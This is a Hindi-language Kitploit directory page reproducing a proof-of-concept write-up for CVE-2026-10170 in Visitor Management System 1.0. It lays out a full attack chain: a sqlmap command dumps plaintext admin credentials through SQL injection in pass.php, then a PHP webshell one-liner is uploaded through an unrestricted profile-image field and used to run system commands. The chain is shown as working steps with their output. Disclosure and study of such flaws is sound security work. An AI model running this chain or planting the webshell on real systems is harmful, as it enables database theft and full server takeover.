Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/xmyronn/cve-2026-10170-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubxmyronn/cve-2026-10170-rce

CVE-2026-10170-RCE

प्रूफ-ऑफ-कॉन्सेप्ट जो SQL इंजेक्शन और अनप्रतिबंधित फ़ाइल अपलोड को जोड़कर Visitor Management System 1.0 में रिमोट कोड एक्ज़ीक्यूशन प्राप्त करने का प्रदर्शन करता है, जिसमें चरण-दर-चरण शोषण और उपचार मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
85 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विज़िटर प्रबंधन प्रणाली 1.0 - SQLi से रिमोट कोड निष्पादन तक (हमला श्रृंखला)

भेद्यता जानकारी

फ़ील्डविवरण
उत्पादविज़िटर प्रबंधन प्रणाली
विक्रेताcode-projects.org
संस्करण1.0
भेद्यता वर्गSQL इंजेक्शन (CWE-89) + असीमित फ़ाइल अपलोड (CWE-434)
CVE IDलंबित
CVSS स्कोर9.8 गंभीर (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
प्रमाणीकरण आवश्यकनिम्न विशेषाधिकार (गार्ड खाता) प्रवेश बिंदु के रूप में
प्रभावित फ़ाइलें/vms/php/pass.php, /vms/php/admin_user_0.php
असुरक्षित पैरामीटरphone (POST)

विवरण

code-projects.org द्वारा विज़िटर प्रबंधन प्रणाली 1.0 SQL इंजेक्शन और असीमित फ़ाइल अपलोड को मिलाकर एक गंभीर हमला श्रृंखला के प्रति असुरक्षित है, जो रिमोट कोड निष्पादन की ओर ले जाती है।

निम्न-विशेषाधिकार पहुंच (गार्ड खाता) वाला एक हमलावर pass.php में phone POST पैरामीटर के माध्यम से SQL इंजेक्शन भेद्यता का शोषण कर सकता है ताकि पूरे डेटाबेस को डंप किया जा सके — जिसमें सादा-पाठ व्यवस्थापक क्रेडेंशियल शामिल हैं। निकाले गए क्रेडेंशियल का उपयोग करके व्यवस्थापक के रूप में प्रमाणित होने के बाद, हमलावर व्यवस्थापक उपयोगकर्ता प्रबंधन पैनल (admin_user_0.php) के माध्यम से एक PHP वेबशेल अपलोड कर सकता है, जो कोई फ़ाइल प्रकार या एक्सटेंशन सत्यापन नहीं करता है। अपलोड की गई वेबशेल वेब-सुलभ निर्देशिका में संग्रहीत होती है और URL के माध्यम से सीधे निष्पादित की जा सकती है, जिसके परिणामस्वरूप सर्वर पर पूर्ण रिमोट कोड निष्पादन होता है।

इसके अतिरिक्त, पासवर्ड डेटाबेस में सादा पाठ में संग्रहीत होते हैं, जिसका अर्थ है कि SQLi डंप के बाद कोई क्रैकिंग चरण आवश्यक नहीं है।


हमला श्रृंखला अवलोकन

निम्न-विशेषाधिकार गार्ड लॉगिन
        ↓
pass.php में SQL इंजेक्शन (phone पैरामीटर)
        ↓
sqlmap डंप → सादा-पाठ व्यवस्थापक क्रेडेंशियल निकाले गए
        ↓
व्यवस्थापक के रूप में लॉगिन (sanjay1:7861)
        ↓
admin_user_0.php में असीमित फ़ाइल अपलोड
        ↓
PHP वेबशेल /vms/php/folder/ में अपलोड की गई
        ↓
?cmd=whoami के माध्यम से RCE → पूर्ण सर्वर समझौता

चरण-दर-चरण प्रमाण की अवधारणा

चरण 1 — निम्न विशेषाधिकार उपयोगकर्ता (गार्ड) के रूप में लॉगिन करें

VMS एप्लिकेशन पर नेविगेट करें और गार्ड क्रेडेंशियल के साथ लॉगिन करें। लॉगिन के बाद, फ़ोन नंबर पृष्ठ पर नेविगेट करें:

http://<TARGET>/vms/php/phone_0.php
Screenshot 2026-05-05 034206

चरण 2 — pass.php में SQL इंजेक्शन की पुष्टि करें

फ़ोन नंबर मान के रूप में एक एकल उद्धरण ' सबमिट करें। एप्लिकेशन एक घातक MariaDB त्रुटि फेंकता है जो कच्चे क्वेरी और फ़ाइल पथ को उजागर करती है:

Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; 
check the manual that corresponds to your MariaDB server version for the right 
syntax to use near '2026-05-05'' at line 1 in 
C:\xampp\htdocs\vms\php\pass.php:9
Stack trace:
#0 C:\xampp\htdocs\vms\php\pass.php(9): mysqli_query(Object(mysqli), 'select * from i...')

प्रभावित फ़ाइल: pass.php पंक्ति 9
असुरक्षित पैरामीटर: phone (POST)

Screenshot 2026-05-05 034215

sql त्रुटि Screenshot 2026-05-05 034228


चरण 3 — sqlmap के साथ SQLi का शोषण करें

Burp Suite द्वारा कैप्चर किए गए अनुरोध को एक फ़ाइल (sqli.txt) में सहेजें और sqlmap चलाएँ:

sqlmap -r sqli.txt --dump --batch

sqlmap सफलतापूर्वक vms डेटाबेस से login_user तालिका को डंप करता है, जिससे सभी उपयोगकर्ताओं के सादा-पाठ क्रेडेंशियल प्रकट होते हैं:

Database: vms
Table: login_user
[2 entries]
+----+---------+------------+---------+-------+--------+----------+-----------+
| id | image   | phone      | name    | user  | gender | password | username  |
+----+---------+------------+---------+-------+--------+----------+-----------+
| 1  | <blank> | 8146905071 | sanjay  | guard | male   | 786      | sanjay123 |
| 2  | <blank> | 8146905071 | sanjay1 | admin | male   | 7861     | sanjay1   |
+----+---------+------------+---------+-------+--------+----------+-----------+

नोट: पासवर्ड सादा पाठ में संग्रहीत हैं — कोई हैश क्रैकिंग आवश्यक नहीं है।

Screenshot 2026-05-05 034316

चरण 4 — व्यवस्थापक के रूप में लॉगिन करें

निकाले गए व्यवस्थापक क्रेडेंशियल का उपयोग करके, व्यवस्थापक पैनल में लॉगिन करें:

उपयोगकर्ता नाम: sanjay1
पासवर्ड: 7861

पूर्ण व्यवस्थापक डैशबोर्ड अब सुलभ है जिसमें कर्मचारी, विभाग, व्यवस्थापक उपयोगकर्ता और रिपोर्ट प्रबंधन शामिल हैं।

Screenshot 2026-05-05 034353

चरण 5 — व्यवस्थापक उपयोगकर्ता पैनल के माध्यम से PHP वेबशेल अपलोड करें

व्यवस्थापक उपयोगकर्ता प्रबंधन पृष्ठ पर नेविगेट करें:

http://<TARGET>/vms/php/admin_user_0.php

पृष्ठ में प्रोफ़ाइल छवि के लिए एक फ़ाइल अपलोड फ़ील्ड है। एप्लिकेशन कोई फ़ाइल प्रकार सत्यापन, कोई एक्सटेंशन फ़िल्टरिंग, और कोई MIME प्रकार जाँच नहीं करता है।

फ़ॉर्म को किसी भी मान के साथ भरें और छवि फ़ाइल (web2_command.php) के रूप में निम्नलिखित PHP वेबशेल अपलोड करें:

<?php echo shell_exec($_GET['cmd']); ?>
Screenshot 2026-05-05 034416

चरण 6 — वेबशेल अपलोड की पुष्टि करें

व्यवस्थापक उपयोगकर्ता प्रदर्शन पृष्ठ पर नेविगेट करें:

http://<TARGET>/vms/php/admin_display_0.php

नव निर्मित व्यवस्थापक खाता तालिका में दिखाई देता है। अपलोड की गई वेबशेल यहाँ संग्रहीत है:

http://<TARGET>/vms/php/folder/web2_command.php
Screenshot 2026-05-05 034429

चरण 7 — रिमोट कोड निष्पादन

वेबशेल के माध्यम से मनमाने सिस्टम कमांड निष्पादित करें:

http://<TARGET>/vms/php/folder/web2_command.php?cmd=whoami

परिणाम: सर्वर वर्तमान सिस्टम उपयोगकर्ता लौटाता है जो पूर्ण रिमोट कोड निष्पादन की पुष्टि करता है:

desktop-g1i9np3\dell
Screenshot 2026-05-05 034438

प्रभाव

  • पूर्ण डेटाबेस समझौता — सभी तालिकाएँ SQLi के माध्यम से डंप की गईं जिनमें सादा-पाठ क्रेडेंशियल शामिल हैं
  • व्यवस्थापक खाता अधिग्रहण — सादा-पाठ पासवर्ड को कोई क्रैकिंग आवश्यक नहीं है
  • रिमोट कोड निष्पादन — वेब सर्वर उपयोगकर्ता के रूप में मनमाने OS कमांड निष्पादित किए गए
  • पूर्ण सर्वर समझौता — अंतर्निहित होस्ट पर पूर्ण नियंत्रण
  • सादा-पाठ पासवर्ड भंडारण — SQLi प्रभाव को बढ़ाता है, क्रेडेंशियल तुरंत उपयोग योग्य

टूल डाउनलोड करें